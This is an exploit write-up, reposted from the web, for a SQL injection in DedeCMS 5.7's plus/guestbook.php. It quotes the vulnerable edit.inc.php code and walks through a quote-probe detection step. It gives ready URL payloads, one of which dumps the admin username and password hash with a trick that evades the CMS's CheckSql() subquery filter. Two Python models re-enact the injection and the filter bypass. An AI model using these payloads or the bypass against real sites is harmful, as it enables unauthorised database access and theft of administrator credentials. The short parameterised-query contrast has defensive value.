DedeCMS 5.7: latest SQL injection exploit for plus/guestbook.php

Source: Internet
Author: User

This article covers the latest SQL injection in DedeCMS 5.7's plus/guestbook.php and how it is exploited; it is shared here for anyone who needs it.

Affected version: DedeCMS 5.7

The vulnerable file is edit.inc.php (pulled in by plus/guestbook.php for action=admin). Note that the editok branch, unlike del and check, does not require $g_isadmin, and that when $remsg is empty the request-supplied $msg is spliced unmodified into the UPDATE:

<?php
if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job = 'view';

if($job=='del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("Successfully deleted a message!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("Successfully reviewed a message!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='editok')
{
    $remsg = trim($remsg);
    if($remsg!='')
    {
        // admin replies are not HTML-filtered   By:errorera blog:errs.cc
        if($g_isadmin)
        {
            $msg = "<p class='rebox'>".$msg."</p>\n".$remsg;
            $remsg = "<br /><font color=red>Admin reply:</font>";
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg FROM `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n";
            $remsg = TrimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
    // $msg is not filtered at all here, so arbitrary SQL can be injected   By:errorera home:www.errs.cc
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("Successfully changed or replied to a message!", $GUEST_BOOK_POS);
    exit();
}

// home:www.errs.cc
if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id' ");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id' ");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}

Conditions for the exploit to work:
1. PHP magic_quotes_gpc = Off. (DedeCMS's common.inc.php normally calls addslashes() on request variables itself when magic quotes are off, but plus/guestbook.php also loads include/filter.inc.php, which re-registers every variable straight from $_GET/$_POST/$_COOKIE without that escaping, so only PHP's own magic quotes stand in the way.)
2. The file plus/guestbook.php exists on the target, and therefore so does the dede_guestbook table.

How to tell whether a site is vulnerable:
First open www.xxx.com/plus/guestbook.php, where other people's messages are listed. Hover over [reply/edit] next to a message: the link shows that message's ID. Note it down, then request:
Access:

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=<existing message ID>

On DedeCMS 5.7 the response after submission says "Successfully changed or replied to a message!" regardless of whether the UPDATE went through, because edit.inc.php calls ShowMsg() right after ExecuteNoneQuery() without checking its result, so that message tells you nothing by itself.
Go back to www.xxx.com/plus/guestbook.php and check whether the content of that message ID has become errs.cc'.

If it has, the single quote was escaped on the way in (magic_quotes_gpc is On) and the site cannot be exploited this way.

If the message was not modified and still shows its previous content, the unescaped quote broke the UPDATE statement, which proves the injection is exploitable.
Then visit again


www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=<existing message ID>&msg=',msg=user(),email='

Go back and the content of that message has been replaced by the output of MySQL's user(). The injected text turns the statement in edit.inc.php into

UPDATE `dede_guestbook` SET `msg`='',msg=user(),email='', `posttime`='...' WHERE id='<ID>'

The leading quote closes the now-empty msg literal, the second msg= assignment overrides it, and the trailing email=' absorbs the closing quote that the original code places after $msg, so the statement stays syntactically valid.
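The following is an added example, not code from DedeCMS or from the original post. It models the editok UPDATE from edit.inc.php above and the two-step procedure described here (probe with a bare quote, then inject an extra msg= assignment) against an in-memory SQLite database, and contrasts it with a parameterised version. Everything about the database is assumed: a cut-down dede_guestbook/dede_admin schema, a constructed admin row, SQLite's doubled quote standing in for the backslash escaping that magic_quotes_gpc/addslashes() would apply, and a Python-defined CONCAT() plus the literal '|' in place of MySQL's CONCAT() and 0x7c.

```python
"""Model of DedeCMS 5.7 edit.inc.php's editok UPDATE, run against SQLite.

Added example, not DedeCMS code. Schema, admin row and the SQLite-specific
substitutions (doubled-quote escaping, CONCAT(), sqlite_version()) are assumptions.
"""
import sqlite3

TABLE_PREFIX = "dede_"   # $dsql->SetQuery() expands the #@__ placeholder to the configured prefix
NOW = 1700000000         # stands in for time()


def build_update(msg, message_id):
    """Splice $msg into the UPDATE exactly as the vulnerable ExecuteNoneQuery() call does."""
    sql = ("UPDATE `#@__guestbook` SET `msg`='%s', `posttime`='%d' WHERE id='%d' "
           % (msg, NOW, message_id))
    # the prefix placeholder is expanded over the whole string, injected text included
    return sql.replace("#@__", TABLE_PREFIX)


def fresh_db():
    """Constructed sample data: one guestbook entry and one admin account (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE dede_guestbook (id INTEGER PRIMARY KEY, title TEXT, msg TEXT,
                                     email TEXT, posttime INTEGER);
        CREATE TABLE dede_admin (id INTEGER PRIMARY KEY, userid TEXT, pwd TEXT);
        INSERT INTO dede_guestbook VALUES (146, 'hello', 'original message', 'a@example.com', 0);
        INSERT INTO dede_admin VALUES (1, 'admin', 'f297a57a5a743894a0e4');
    """)
    # SQLite has no CONCAT(); this variadic stand-in lets the admin-dump subquery run
    conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))
    return conn


def stored_msg(conn, message_id):
    return conn.execute("SELECT msg FROM dede_guestbook WHERE id=?", (message_id,)).fetchone()[0]


def vulnerable_editok(conn, msg, message_id, quotes_escaped=False):
    """job=editok with an empty $remsg: $msg goes straight into the statement.
    Returns the stored message afterwards, or None if the statement failed to parse."""
    if quotes_escaped:
        msg = msg.replace("'", "''")   # the effect magic_quotes_gpc=On would have (SQLite form)
    try:
        conn.execute(build_update(msg, message_id))
    except sqlite3.Error:
        return None
    return stored_msg(conn, message_id)


def safe_editok(conn, msg, message_id):
    """Hardened form: bind the value instead of splicing it; the payload is stored as inert text."""
    conn.execute("UPDATE dede_guestbook SET msg=?, posttime=? WHERE id=?", (msg, NOW, message_id))
    return stored_msg(conn, message_id)


def probe(conn, message_id, quotes_escaped=False, marker="errs.cc'"):
    """The detection step from the write-up: submit a message ending in a single quote,
    then look at what the guestbook shows for that ID afterwards."""
    before = stored_msg(conn, message_id)
    after = vulnerable_editok(conn, marker, message_id, quotes_escaped)
    if after == marker:
        return "escaped"      # UPDATE succeeded, the quote was escaped: not injectable this way
    if after is None and stored_msg(conn, message_id) == before:
        return "vulnerable"   # the bare quote broke the statement and nothing changed
    return "unknown"


# Payloads in the shape used by the write-up, adapted to SQLite's function set.
USER_PAYLOAD = "',msg=sqlite_version(),email='"   # stands in for ',msg=user(),email='
DUMP_PAYLOAD = "',msg=(SELECT CONCAT(userid,'|',pwd) FROM `#@__admin` LIMIT 1),email='"

if __name__ == "__main__":
    print(probe(fresh_db(), 146))                                       # vulnerable
    print(probe(fresh_db(), 146, quotes_escaped=True))                  # escaped
    print(vulnerable_editok(fresh_db(), USER_PAYLOAD, 146))             # the SQLite version string
    print(vulnerable_editok(fresh_db(), DUMP_PAYLOAD, 146))             # admin|f297a57a5a743894a0e4
    print(safe_editok(fresh_db(), DUMP_PAYLOAD, 146) == DUMP_PAYLOAD)   # True
```

The DUMP_PAYLOAD keeps the `#@__admin` placeholder on purpose: because SetQuery() expands the prefix over the whole statement, injected text gets the real table name for free, which is why the page's final payload can name the admin table without knowing the site's prefix.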

That is the gist of how it is used; anyone interested can dig further.

Finally, some will ask how to get the password of the back-end admin account from this: work it out yourself. It can definitely be dumped (if it could not, I would not be posting this)!

/plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(SelecT CONCAT(userid,0x7c,pwd) from `%23@__admin` LIMIT 0,1),email='

Notes on this payload: `#@__` is DedeCMS's table-prefix placeholder, which $dsql expands to the configured prefix (dede_ by default), so it can be used without knowing the site's prefix, and `#` must be URL-encoded as %23. The @`'` token is a backtick-quoted MySQL user-variable name consisting of a single quote: MySQL reads it as a harmless variable reference, while the naive quote-pairing that $dsql's CheckSql() performs before its keyword checks treats that quote as the start of a string literal and therefore never sees the (SELECT ...) that would otherwise trip its "subquery detect" check. The final msg= assignment then stores userid|pwd of the first row of the admin table as the message text.
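To show why the @`'` token is needed, here is an added example (not DedeCMS code and not from the original post) that models the quoted-string stripping step of CheckSql() in DedeCMS's dedesql.class.php and runs the admin-dump payload through it with and without the token. The stripping loop and the three checks modelled (union, comment, subquery) are reproduced from memory of the 5.7 source and are an assumption; the real function has more checks and logs rejected statements.

```python
"""Simplified model of the quote-stripping done by DedeCMS's CheckSql() before its
keyword checks. Added example, not DedeCMS code; the loop and checks are an
assumption reconstructed from memory of dedesql.class.php in 5.7."""
import re

TABLE_PREFIX = "dede_"
# the editok statement from edit.inc.php, with $msg left as a %s slot and time()/id fixed
TEMPLATE = "UPDATE `#@__guestbook` SET `msg`='%s', `posttime`='1700000000' WHERE id='146' "


def strip_quoted(sql):
    """Replace each '...' literal with $s$, treating a backslash as escaping the next
    character. An unterminated literal yields $s$ followed by the rest of the text,
    which is what the original loop does when it finds no closing quote."""
    out, pos = [], 0
    while True:
        start = sql.find("'", pos)
        if start == -1:
            out.append(sql[pos:])
            break
        out.append(sql[pos:start])
        out.append("$s$")
        end = start + 1
        while end < len(sql):
            if sql[end] == "\\":
                end += 2
                continue
            if sql[end] == "'":
                break
            end += 1
        if end >= len(sql):          # no closing quote: append the remainder raw
            out.append(sql[start + 1:])
            break
        pos = end + 1
    clean = "".join(out)
    return re.sub(r"\s+", " ", clean).strip().lower()


def check_sql(sql):
    """Return the name of the check that rejects the statement, or None if it passes."""
    clean = strip_quoted(sql.replace("#@__", TABLE_PREFIX))   # SetQuery() expands the prefix first
    if re.search(r"(^|[^a-z])union($|[^a-z])", clean):
        return "union detect"
    if any(token in clean for token in ("/*", "--", "#")):
        return "comment detect"
    if re.search(r"\([^)]*?select", clean):
        return "subquery detect"
    return None


# the page's admin-dump payload, without and with the @`'` token
NAIVE = "',msg=(SelecT CONCAT(userid,0x7c,pwd) from `#@__admin` LIMIT 0,1),email='"
BYPASS = "',msg=@`'`,msg=(SelecT CONCAT(userid,0x7c,pwd) from `#@__admin` LIMIT 0,1),email='"

if __name__ == "__main__":
    print(check_sql(TEMPLATE % NAIVE))    # subquery detect
    print(check_sql(TEMPLATE % BYPASS))   # None
    print(strip_quoted(TEMPLATE % BYPASS))
```

With the naive payload every quote pairs up and the (SELECT ...) is left in the cleaned text, so the check fires. With the token, the quote inside the backticks pairs with the first quote of email='' and swallows the whole subquery into a $s$ placeholder, after which every remaining quote is shifted by one, so the checker sees only placeholders and numbers while MySQL still parses the statement normally.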
